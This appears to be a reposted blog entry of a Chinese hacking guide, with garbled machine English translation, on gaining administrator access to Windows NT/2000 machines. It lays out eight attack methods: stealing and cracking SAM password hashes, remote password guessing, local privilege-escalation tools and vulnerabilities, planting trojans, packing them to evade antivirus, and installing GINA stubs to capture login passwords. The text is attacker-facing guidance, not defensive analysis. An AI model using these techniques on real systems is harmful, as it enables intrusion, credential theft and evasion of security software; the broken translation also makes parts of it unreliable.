一般过程如下: General process is as follows:
方法1: Method 1:
拿他的%system%\\repair\\sam.*,然后回去用l0pht破解,只要能拿到,肯花时间,就一定可以破解。 Take his% system% \ \ repair \ \ sam .*, and then go back with l0pht break, as long as can get, take the time, you will be able to crack.
问题:(1)你不一定可以访问该文件(看你的身份和人家的设置); Questions: (1) you can not access the file (see your identity and set of others);
(2)同时这个文件是上次备份时的帐号列表(也可能是第一次安装时的),以后更改帐号的话,就没用了。 (2) At the same time when the file was last backed up the account list (it may be when first installed), change the account since then useless.
方法2: Method 2:
使用pwdump(l0pht自带的,2000下无效)或单独的pwdump2,取得本机当前的用户列表和口令加密列表,然后用l0pht破解这个列表。 Use pwdump (l0pht own, under the invalid 2000) or separate pwdump2, get local listings and the current user password encryption list, then l0pht crack this list.
问题:一般guests,使用unicode漏洞运行cmd时是IUSR_computer身份,guests组的,没有权限这样做。 Problem: the general guests, use the unicode vulnerability when running cmd IUSR_computer identity, guests group, do not have permission to do so.
(以上两种是离线的) (The above two are offline)
方法3: Method 3:
使用enum等程序进行远程破解,猜口令。 Use enum and other procedures for remote crack, password guessing.
问题:(1)如果对方设置了帐号锁定的话,你破解几次,该帐号就锁定了,不能再破解; Questions: (1) If the other party set account lockout, you break a few times, the account is now locked and can not break;
(2)对方要开放netbios连接,如果用firewall过滤了的话就不行了。 (2) open netbios connect to each other, if a firewall filter, then to die.
以上方法是破解而得密码的,还有直接把现有用户提升权限或者添加用户的。 Derived from the above method is to break the password, as well as directly to existing users or add users elevated privileges.
方法4: Method 4:
getadmin - nt4 、pipeupadmin -2000, 在本机运行可以把当前用户帐号加入admin组。 getadmin - nt4, pipeupadmin -2000, run the machine can be added to the current user account admin group.
问题:(1)getadmin在sp4有补丁修复了,不能再用,当然后来又有getadmin的增强版本,不过也在sp6a下好像都不行。 Questions: (1) getadmin sp4 with patches in the repair, and not then, of course, there was an enhanced version of getadmin, but also seems to not work under sp6a.
(2)pipeupadmin 可以由guest成功运行,现在有补丁了 (2) pipeupadmin can be run successfully by the guest, there are patches of
方法5: Method 5:
win2000的net dde服务漏洞可以执行任意程序,可以借此更改密码、添加用户等。 win2000 the net dde service vulnerability can execute arbitrary programs, you can take to change the password, add users.
问题:需要正式用户才能运行攻击程序,guest不行。 Problem: the need for users to run the attack program official, guest not.
方法6: Method 6:
win2000的输入法漏洞,可以本地执行程序提升权限,如果开放终端服务的话,远程也可以。 win2000 input method loopholes, you can execute the program to enhance the local authority, if the open Terminal Services, then the remote can.
另外还有变通的方法。 Another viable alternative.
方法7: Method 7:
木马:上传木马,然后运行,下次重起动后,就是本地登录用户的权限了。 Trojan: Trojan upload, and then run after the next re-start is locally logged on user permissions. 很可能就是admin 。 Is probably admin.
问题:(1)杀毒软件可能阻止你的木马运行; Questions: (1) anti-virus software may prevent your horse to run;
(2)有的木马好像在guests下不能运行,可能与他添加自动运行的方式有关;如没有权限向注册表的自动运行位置添加,不能写入%system%\\system32目录(据我所知,一般的木马都改变文件名,然后写入系统目录,如果你没有这个写入权限,就不能执行了)。 (2) Some Trojans can not be run like the guests, he may add the way to run automatically; if the registry does not have permission to add the location of the automatic operation, can not write to% system% \ \ system32 directory (as far as I know , the general Trojan file name has changed, and then written to the system directory, if you do not have the write permissions, you can not perform a).
如果那位能试验出结果,不妨提出来。 If that can test the results, it may be proposed.
另外提一句,虽然ntshell不算什么木马,我的定位是远程控制,我在做他的添加自动运行时没有向系统目录进行拷贝,只是引用当前程序(或者可以指定的其他程序),因此system32没有写权限也可以,不过在所有添加自动运行的位置要有一个位置有写权限才行。 Also mention that, although ntshell nothing Trojans, my position is a remote control, I was doing when he did not run automatically added to the system directory, copy, just refer to the current program (or you can specify other programs), so there is no system32 write access can be, but add in all the location automatically have to have a write access to the job position.
解决:(1)可以使用压缩程序将木马压缩,从而逃过杀毒软件的特征码;可以使用aspack试试,我曾成功压缩了一个逃过了金山毒霸正式版。 Solution: (1) Trojan horse program can be compressed using compression to escape the anti-virus software signature; can use aspack try, I have successfully escaped the compression of a full version of Kingsoft. 不过也有的木马压不了,如冰河。 However, pressure and some Trojans can not, such as ice.
方法8: Method 8:
gina、ginastub木马。 gina, ginastub Trojans. 虽然这个也叫木马,但是它的功能和上边一个大不一样,因为一般的木马是在对方安装一个server端,一旦运行就可以使用client端连接对server端进行操作。 Although this is also called Trojans, but its function and above a big difference, because most of the Trojan is installed in a server-side each other, once running, you can use client-side connection to the server side operations. 而ginastub一般只有一个dll,需要手工安装和卸载,他的功能也不是client端控制server端,它仅仅就是捕获登录密码。 The ginastub generally only a dll, need to manually install and uninstall, his function is not client-side control server side, it just is to capture the login password.
问题:安装较麻烦,成功的可能性低,安装不当被安装的系统有不能启动的危险。 Problem: Installation is more complicated, the likelihood of success is low, improper installation, the system has been installed the danger can not be started. 具体使用方法可以看看我在ntshell里提供的一个gina例子的使用方法。 I can see the specific use to provide an in ntshell gina example in the use of methods.
Tidak ada komentar:
Posting Komentar